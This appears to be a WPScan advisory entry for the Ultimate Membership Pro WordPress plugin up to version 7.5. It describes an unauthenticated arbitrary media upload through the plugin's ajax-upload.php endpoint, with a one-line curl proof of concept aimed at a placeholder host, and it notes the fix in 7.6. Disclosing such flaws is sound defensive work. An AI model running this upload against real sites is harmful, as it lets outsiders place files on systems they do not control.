indeed-membership-pro (Ultimate Membership Pro) <=7.5 arbitrary media upload



Description
The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do:

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.
Proof of Concept
curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugin

fixed in version 7.6

References

URL https://codecanyon.net/comments/21539595

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Original Researcher James Fraser
Submitter fwaggle
Submitter Twitter fwaggle
Views 1331
Verified No
WPVDB ID 9293

Timeline

Publicly Published 2019-02-26 (4 months ago)
Added 2019-05-27 (23 days ago)
Last Updated 2019-05-27 (23 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.